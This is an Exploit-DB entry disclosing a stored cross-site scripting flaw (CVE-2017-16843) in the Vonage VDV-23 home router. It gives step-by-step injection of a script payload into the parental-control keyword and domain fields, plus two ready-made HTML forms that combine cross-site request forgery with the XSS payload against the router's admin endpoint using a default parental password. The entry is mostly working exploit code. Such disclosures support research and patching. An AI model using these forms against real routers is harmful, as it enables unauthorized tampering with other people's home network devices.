Vonage VDV23 - Cross-Site Scripting

EDB-ID:

43150

CVE:

2017-16843

EDB Verified:

Author:

Nu11By73

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2017-11-16

Vulnerable App: 
# Exploit Title: Vonage Home Router – Stored Xss
# Date: 16/11/2017
# Exploit Author: Nu11By73
# Hardware Version: VDV-23: 115
# Software Version: 3.2.11-0.9.40
# CVE : CVE-2017-16843



NewKeyword Parameter:

1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these keywords text box enter: test”><script>alert(1)</script>
5. Click the add keyword button to receive the pop up. 


NewDomain Parameter:

1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these websites text box enter: test”><script>alert(1)</script>
5. Click the add domain button to receive the pop up.

Proof of concept code:

NewDomain.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="" / >
<input type="hidden" name="KeywordAction" value="0" />
<input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" />
<input type="hidden" name="x" value="50" />
<input type="hidden" name="y" value="15" />
<input type="hidden" name="DomainAction" value="1" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Exploit" />
</form>
</html>

NewKeyword.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / >
<input type="hidden" name="x" value="61" />
<input type="hidden" name="y" value="12" />
<input type="hidden" name="KeywordAction" value="1" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Enable Service" />
</form>
</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services